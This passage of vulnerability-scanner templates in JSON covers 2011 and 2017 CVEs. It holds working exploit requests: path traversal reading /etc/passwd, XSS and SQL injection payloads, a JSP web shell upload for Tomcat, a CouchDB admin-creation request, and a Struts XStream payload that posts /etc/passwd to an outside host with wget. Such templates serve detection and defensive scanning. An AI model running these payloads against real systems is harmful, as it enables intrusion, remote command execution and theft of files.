Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2780","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-0049","info":{"name":"Majordomo2 - SMTP/HTTP Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5252","info":{"name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2011-4926","info":{"name":"Adminimize 1.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Adminimize ==="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5265","info":{"name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Featurific For Wordpress"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4336","info":{"name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-3315","info":{"name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4640","info":{"name":"WebTitan < 3.60 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login-x.php HTTP/1.1\nHost: {{Hostname}}\n","POST /login-x.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\njaction=login&language=en_US&username={{username}}&password={{password}}\n","GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"success\\\":true\")","contains(body_1, \"WebTitan\")","regex('root:.*:0:0:', body)","status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2017-15944","info":{"name":"Palo Alto Network PAN-OS - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID={{randstr}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@start@Success@end@"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5631","info":{"name":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18598","info":{"name":"WordPress Qards - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/qards/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["console.log"]}]}]},{"id":"CVE-2017-18530","info":{"name":"Rating by BestWebSoft < 0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Rating by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18558","info":{"name":"Testimonials by BestWebSoft < 0.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Testimonials by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-9805","info":{"name":"Apache Struts2 S2-052 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/struts2-rest-showcase/orders/3","{{BaseURL}}/orders/3"],"body":"<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"java.lang.ProcessBuilder\">\n                      <command>\n                        <string>wget</string>\n                        <string>--post-file</string>\n                        <string>/etc/passwd</string>\n              <string>{{interactsh-url}}</string>\n                      </command>\n                      <redirectErrorStream>false</redirectErrorStream>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>asdasd</name>\n                  </filter>\n                  <next class=\"string\">asdasd</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</map>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["Debugging information","com.thoughtworks.xstream.converters.collections.MapConverter"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-14849","info":{"name":"Node.js <8.6.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../a/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12635","info":{"name":"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation","severity":"critical"},"requests":[{"raw":["PUT /_users/org.couchdb.user:poc HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\n\n{\n  \"type\": \"user\",\n  \"name\": \"poc\",\n  \"roles\": [\"_admin\"],\n  \"roles\": [],\n  \"password\": \"123456\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","Location:"]},{"type":"word","part":"body","words":["org.couchdb.user:poc","conflict","Document update conflict"]},{"type":"status","status":[201,409]}]}]},{"id":"CVE-2017-18542","info":{"name":"Zendesk Help Center by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Zendesk Help Center by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-11629","info":{"name":"FineCMS <=5.0.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>p\u4e0d\u5b58\u5728"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12138","info":{"name":"XOOPS Core 2.5.8 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /user.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login\n","GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2017-11444","info":{"name":"Subrion CMS <4.1.5.10 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27{{hex_string}}%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{string}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12617","info":{"name":"Apache Tomcat - Remote Code Execution","severity":"high"},"requests":[{"raw":["PUT /{{randstr}}.jsp/ HTTP/1.1\nHost: {{Hostname}}\n\n<% out.println(\"CVE-2017-12617\");%>\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2017-12617"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12615","info":{"name":"Apache Tomcat Servers - Remote Code Execution","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/poc.jsp/"],"body":"<%@ page import=\"java.util.*,java.io.*\"%>\n<%\nif (request.getParameter(\"cmd\") != null) {\n        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n        OutputStream os = p.getOutputStream();\n        InputStream in = p.getInputStream();\n        DataInputStream dis = new DataInputStream(in);\n        String disr = dis.readLine();\n        while ( disr != null ) {\n                out.println(disr);\n                disr = dis.readLine();\n                }\n        }\n%>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3132","info":{"name":"Fortinet FortiOS < 5.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var action = '</script><script>alert(document.domain)</script><script>"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12637","info":{"name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WEB-INF","META-INF"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3506","info":{"name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\nContent-Type: text/xml;charset=UTF-8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header>\n    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n      <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n        <void id=\"url\" class=\"java.net.URL\">\n          <string>http://{{interactsh-url}}</string>\n        </void>\n        <void idref=\"url\">\n          <void id=\"stream\" method =\"openStream\"/>\n        </void>\n      </java>\n    </work:WorkContext>\n    </soapenv:Header>\n  <soapenv:Body/>\n</soapenv:Envelope>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-18516","info":{"name":"LinkedIn by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"LinkedIn by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-9506","info":{"name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-5521","info":{"name":"NETGEAR Routers - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["right\">Router\\s*Admin\\s*Username<","right\">Router\\s*Admin\\s*Password<"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18532","info":{"name":"Realty by BestWebSoft < 1.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/realty/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Realty by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-1000170","info":{"name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"],"body":"dir=%2Fetc%2F&onlyFiles=true","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<li class='file ext_passwd'>","<a rel='/passwd'>passwd</a></li>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18565","info":{"name":"Updater by BestWebSoft < 1.35 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/updater/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Updater by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18537","info":{"name":"Visitors Online by BestWebSoft < 1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Visitors Online by\")"],"condition":"and"}]}]},{"id":"CVE-2017-15647","info":{"name":"FiberHome Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000028","info":{"name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd","{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-5982","info":{"name":"Kodi 17.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12544","info":{"name":"HPE System Management - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var prodName = '';prompt`document.domain`;//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8229","info":{"name":"Amcrest IP Camera Web Management - Data Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/Sha1Account1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DevInformation","SerialID"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12149","info":{"name":"Jboss Application Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /invoker/JMXInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/EJBInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/readonly HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["JBoss","ClassCastException"],"condition":"and","case-insensitive":true},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2017-18566","info":{"name":"User Role by BestWebSoft < 1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/user-role/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"User Role by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18491","info":{"name":"Contact Form by BestWebSoft < 4.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form by\")"],"condition":"and"}]}]},{"id":"CVE-2017-5868","info":{"name":"OpenVPN Access Server 2.1.4 - CRLF Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__session_start__/%0aSet-Cookie:%20crlfinjection=1;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["^Set-Cookie: crlfinjection=1;"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2017-14186","info":{"name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17451","info":{"name":"WordPress Mailster <=1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP Mailster ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11586","info":{"name":"FineCMS <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?s=member&c=login&m=index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nback=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n","GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["Refresh:(.*)url=http:\\/\\/interact\\.sh"]}]}]},{"id":"CVE-2017-1000163","info":{"name":"Phoenix Framework - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?redirect=/\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2017-18528","info":{"name":"PDF & Print by BestWebSoft < 1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, 